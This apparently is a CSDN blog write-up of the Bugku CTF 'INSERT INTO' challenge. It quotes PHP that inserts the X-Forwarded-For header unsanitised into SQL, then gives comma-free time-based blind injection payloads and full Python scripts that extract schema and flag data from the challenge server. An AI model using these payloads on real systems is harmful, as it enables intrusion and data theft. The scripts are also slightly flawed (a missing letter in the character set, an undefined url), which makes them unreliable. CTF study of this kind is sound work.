bugku—INSERT INTO注入解答

最新推荐文章于 2021-03-10 08:08:40 发布
最新推荐文章于 2021-03-10 08:08:40 发布
阅读量2.2k 收藏 7
点赞数 6
分类专栏: 杂乱的东西 文章标签: ctf sql注入 时间盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jlu16/article/details/86264633
版权

本来不打算单独的ctf题目成文,但是这个题写payload快看花我的眼睛了,不写一篇记录一下代码对不住我的眼睛。

题目主页:https://ctf.bugku.com/challenges

error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

题目中给出了源码,简单分析可以看出脚本读取http头部x-forwarded-for作为ip地址,在将其传给$ip之前,以 , 为分割符进行分割并取结果数组的第一项。

要进行注入的sql语句为 :

insert into client_ip (ip) values ('$ip')

很明显,这是一道过滤了逗号的xff注入题目。由于返回结果无有效回显,可以进行时间盲注。

我看到网络上有些writeup在猜解flag时直接得知了它在flag表的flag列,也许是一种巧妙的猜测?老子是猜不到,只能通过information_schema数据库慢慢猜解表和列了。

一些知识点:

  1. 元数据在sql注入中的应用,即informations_schema库中的SCHEMATA、TABLES、COLUMNS表中存储着数据库系统中数据库、表、列的信息。
  2. MySQL中的case when语句。进行时间盲注时自然想到的是if(cond,expr1,expr2)语句,但是此处对逗号进行了过滤,因此采用case when 代替if进行时间盲注。
  3. substr截取字符串的非逗号形式。进行时间盲注要穷举字符,需要通过substr截取字符串,但是常用的形式substr([str],[from],[len])含有逗号,因此采用substr([str] from [from] for [len])来代替,比如substr(‘asd’,1,2)与substr(‘asd’ from 1 for 2)都获得’as’。
  4. limit的非逗号形式。有时一条语句可以查询出多个结果,进行一一猜解时要每次限制查询出一条结果,在不使用逗号时,用limit [len] offset [offset] 代替 limit [offset],[len]。

下面是猜解代码,可以通过改写为多线程/进程提高网络io速度,可以通过提高sleep及timeout时间提高准确度。

猜解库及表:

import requests

dic='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUZWXYZ_'
#猜解数据库名称的payload
payload_db = "1'+(select case when (substr(database() from {0} for 1)='{1}') then sleep(6) else 1 end)+'1"
#猜解表数量的payload
payload_tb_num = "1'+(select case when (select count(*) from information_schema.TABLES where TABLE_SCHEMA='{0}')='{1}' then sleep(6) else 1 end)+'1"
#猜解表名字长度的payload,注:其实也可不猜解长度,直接猜解具体字符,当发现名称字符串不变时(即不再捕获到ReadTimeout异常添加字符时)说明猜解完成
payload_tb_name_len = "1'+(select case when (select length(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='{0}' limit 1 offset {1}) = '{2}' then sleep(6) else 1 end)+'1"
#猜解表名字的payload
payload_tb_name = "1'+(select case when (substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='{0}' limit 1 offset {1}) from {2} for 1)) = '{3}' then sleep(6) else 1 end)+'1"
url = 'http://123.206.87.240:8002/web15/'

db_name = '' 
#数据库名破解
for i in range(1,6):
    for j in dic:
        try:
            headers = {'x-forwarded-for':payload_db.format(i,j)}
            res = requests.get(url,headers=headers,timeout=5)
        except requests.exceptions.ReadTimeout:
            print(payload_db.format(i,j))
            db_name += j
            break
print('db_name: ' + db_name) #运行后可知数据库名为web15
#表数量破解
tb_num = 0
for i in range(1,50):
    try:
        headers = {'x-forwarded-for':payload_tb_num.format(db_name,str(i))}
        res = requests.get(url,headers=headers,timeout=5)
    except requests.exceptions.ReadTimeout:
        tb_num = i
        print('tb_num: '+str(i))
        break
#运行后可知有两个表
#表名破解
len = 0
for i in range(tb_num):
    #crack length first
    for j in range(50):
        try:
            headers = {'x-forwarded-for':payload_tb_name_len.format(db_name,i,j)}
            res = requests.get(url,headers=headers,timeout=5)
        except requests.exceptions.ReadTimeout:
            len = j
            break
    print('No.'+str(i+1)+' table has length: ' + str(len))
    #crack name
    tb_name = ''
    for k in range(1,len + 1):
        for j in dic:
            try:
                headers = {'x-forwarded-for':payload_tb_name.format(db_name,i,k,j)}
                res = requests.get(url,headers=headers,timeout=5)
            except requests.exceptions.ReadTimeout:
                print(payload_tb_name.format(db_name,i,k,j))
                tb_name += j
                break
        print(tb_name)
	#运行后可知两个表为flag和client_ip

猜解列:

import requests

dic='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUZWXYZ_'

#crack column number 运行后可知仅有1列
target_db = 'web15'
target_tb = 'flag'
col_num = 0
payload_col_num = "1'+(select case when (select count(*) from information_schema.COLUMNS where TABLE_SCHEMA='{0}' and TABLE_NAME='{1}') = '{2}' then sleep(6) else 1 end)+'1"
payload_col_len = "1'+(select case when (select length(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA='{0}' and TABLE_NAME='{1}' limit 1 offset {2}) = '{3}' then sleep(6) else 1 end)+'1"
payload_col_name = "1'+(select case when (substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='{0}' and TABLE_NAME='{1}' limit 1 offset {2}) from {3} for 1)) = '{4}' then sleep(6) else 1 end)+'1"
for i in range(50):
    try:
        headers = {'x-forwarded-for':payload_col_num.format(target_db,target_tb,i)}
        res = requests.get(url,headers=headers,timeout=5)
    except requests.exceptions.ReadTimeout:
        col_num = i
        print('col_num=' + str(col_num))
        break
#crack column name
len = 0
for i in range (col_num):
    #crack column length 运行后可知长度为4
    for j in range(50):
        try:
            headers = {'x-forwarded-for':payload_col_len.format(target_db,target_tb,i,j)}
            res = requests.get(url,headers=headers,timeout=5)
        except requests.exceptions.ReadTimeout:
            len = j
            print('No.' + str(i+1) + ' length : ' + str(len))
            break
    #crack name 运行后可知列名字为flag
    col_name = ''
    for k in range(1,len + 1):
        for j in dic:
            try:
                headers = {'x-forwarded-for':payload_col_name.format(target_db,target_tb,i,k,j)}
                res = requests.get(url,headers=headers,timeout=5)
            except requests.exceptions.ReadTimeout:
                col_name += j
                print(col_name)
                break

猜解flag:

import requests

dic='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUZWXYZ_'

#get content 猜解flag
flag = ''
paylaod_content = "1'+(select case when (substr((select flag from flag) from {0} for 1)) = '{1}' then sleep(6) else 1 end)+'1"
for i in range(1,100):
    for j in dic:
        try:
            headers = {'x-forwarded-for':paylaod_content.format(i,j)}
            res = requests.get(url,headers=headers,timeout=5)
        except requests.exceptions.ReadTimeout:
            print(paylaod_content.format(i,j))
            flag += j
            break
    print(flag)
jlu16
关注
专栏目录
bugku web——INSERT INTO注入
xiaoduanDDG的博客
08-13 244
bugku web——INSERT INTO注入 最爱的代码审计来 初步判断存在sql注入(请求头) 并且过滤了逗号 抓包试了一下,网页上没有回显点,所以是基于时间盲注() 正常时间盲注用这种格式来完成 if(exp1,exp2,exp3) 但是代码中explode()函数已经将逗号过滤掉了 所以采用这种格式:case when exp1 then sleep(1) else end 来绕过逗号的过滤 exp1中字符串截取subtr1(str,1,1)又存在逗号,于是这里用substr (str) f
bugku INSERT INTO注入(基于时间盲注,详细教程)
wssmiss的博客
07-22 1477
题目 链接地址:http://123.206.87.240:8002/web15/ 分析 打开页面后: 分析页面的php代码 通过源码分析,注入点在x-forwarded-for:client,proxy1,proxy2的clienr处。获取用户ip,并把ip插入到client_ip表中的ip列中 因为源码第一行,关闭了错误报告,所以没有回显。在此采取基于时间盲注 ...
bugku INSERT INTO
Superpig的博客
11-18 213
时间盲注典例 思路 1、分析给出的源码,找出注入点 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REMOTE_ADDR']; } ...
CTFBugku insert into注入
weixin_41607190的博客
01-07 385
原理:x-forwared-for注入时间盲注insert注入 点开网址就是这么一句话,源码也给出 function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; #从x-forwared-for获取ip }else{ $ip =...
SQL注入 (中级篇)Insert注入
热门推荐
weixin_41472455的博客
05-14 6万+
insert注入: 其实对于初学SQL注入,并不需要区分注入类型。 但是要理解insert注入,首先需要理解SQL的insert语句 举个例子 :在Student表插入bob的信息 Student表: |-----------------------------------| | name | age | grade | |-----------------------------------| | andy | 14 | 98 | ...
insert注入笔记
收集盒 Book box
07-06 781
Author:昆仑男银群里有人在问insert型的怎么注射,insert类型的我还没碰到过呢,就去看了看,做了一下笔记备忘。http://www.kunlun.com/nanyin.aspx?ProID=49579′ 加一个点,报错是insert类型的语句,百
bugku web题INSERT INTO注入.docx
05-16
### bugku Web题INSERT INTO注入知识点详解 #### 一、背景与目标 在CTF(Capture The Flag)比赛中,Web安全挑战是常见的题型之一。本文档中的“bugku web题INSERT INTO注入”是一个典型的利用SQL注入漏洞进行攻击...
Bugku INSERT-INTO注入
ChanCherry的博客
11-20 214
error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REMOTE_ADDR']; } $ip_arr = explode(',', $ip...
bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本)
Sea_Sand息禅
03-31 1381
flag格式:flag{xxxxxxxxxxxx} 不如写个Python吧 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REM...
Bugku:web INSERT INTO注入
qq_26961571的博客
09-09 218
打开之后, ​ 发现了一串代码,而这串代码就是php。一看这么多,我其实还是很有畏难情绪的,感觉脑壳都大了。但是怎么办,还是得硬上啊!!都已经啃到这里了,现在放弃也太可惜了吧其实最近思虑很多,感觉没有未来。每次都说那能怎么办呢??是啊,能怎么办呢?只能尽全力去想去做,但是真的好累。我又是缺乏安全感的人,要通过自己的努力调节情绪,已经不止一次想过要放弃了,放弃是多么简单的事情,比鼓起勇气的死亡还要简单的多。 回到正题,仔细分析一下代码。 error_reporting(0);​funct..
bugku-INSERT INTO注入(XFF时间注入) writeup
xuchen16的博客
09-30 6284
网址:http://120.24.86.145:8002/web15/ 题目给了源码 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = ...
bugku学习之37.insert into注入
s11show_163的博客
03-04 628
考察: xff头注入 insert into 注入格式是1'+(注入语句)# 延时注入 逗号屏蔽$ip_arr = explode(',', $ip);下无法使用if注入以及对substr函数修改引出的启发 给出了源码提示: <?php error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_...
bugku------INSERT INTO 注入
bylfsj的博客
09-30 492
原创 bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本) ...
bugku-web-insert into 注入
realstarstarli的博客
08-09 246
insert into 注入 题目分析 题目地址http://123.206.87.240:8002/web15/ 首先题目中已经给出了php源码,先分析一下。我在原来的代码上做了一些修改,便于调试操作。 <?php //隐藏报错信息 error_reporting(0); // 函数功能获取用户的ip地址 function getIp() { // PHP使用$_SERVER['HTTP_X_FORWARDED_FOR']获取IP //
BUGKu中的Insert注入
Mikasa
03-28 661
这道题因为是先输出的IP的信息,然后再将IP存入了数据库中,并且关闭了所有的报错提示。 因此用时间注入的方式比较好 首先我们先认识一个新的Python中的time模块,time.time()返回当前的时间,只要我们在发送数据包之前以及收到返回包之后各设置一个,就可以通过判断两时间之差确认我们判断的字符!!!! 其实没有什么难的,有相对好点的其他语言基础,相信能很快写出来 当然这道题还不是简单的时...
BugKusql注入
D-R0s1的博客
08-08 920
       今天和大家分享一道BugKu中关于sql注入的题目,在web题中,sql注入的相关知识可以说随处可见了,在这里咱们就就题论题不做其他的拓展和延伸了。        拿到题以后,还是老套路,and 1=1和and 1=2 看看是否带入查询,但是这个题目在?id=1和?id=1'两种条件下都不报错,查看页面源代码发现gb2312于是尝试宽字节注入。?id=1%bf' union sel...
实验吧——who are you?(insert into注入 二分法 时间盲注
weixin_30947043的博客
10-13 150
题目地址:http://ctf5.shiyanbar.com/web/wonderkun/index.php 根据提示 “我要把攻击我的人都记录db中去!” 猜测这是insert into注入,会向数据库储存ip地址,所以注入点便是我们的ip,而ip可以用X-Forwarded-For伪造 由于注入点的特殊,这里注入是不能用逗号的,因为服务器在从X-Forwarded-Fo...
php+insert+into+注入,PHP注入总结(写给自己)
weixin_36087083的博客
03-10 1709
' or 1=1' or '1=1'/*'%23' and password='mypassid=-1 union select 1,1,1id=-1 union select char(97),char(97),char(97)id=1 union select 1,1,1 from membersid=1 union select 1,1,1 from adminid=1 union sele...
bugku-实战2-注入
偷一个月亮
06-29 337
news存在注入点,4个字段 select tables 发现表太多了,显示不全 这时用字符截断函数 get flag
insert into注入
最新发布
09-11
"insert into" 是一种 SQL 语句,用于将数据插入到数据库表中。然而,如果不正确使用,它可能会导致注入攻击。注入攻击是一种利用不正确的输入验证或不安全的查询构造来在应用程序中插入恶意代码的攻击方式。这可能...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值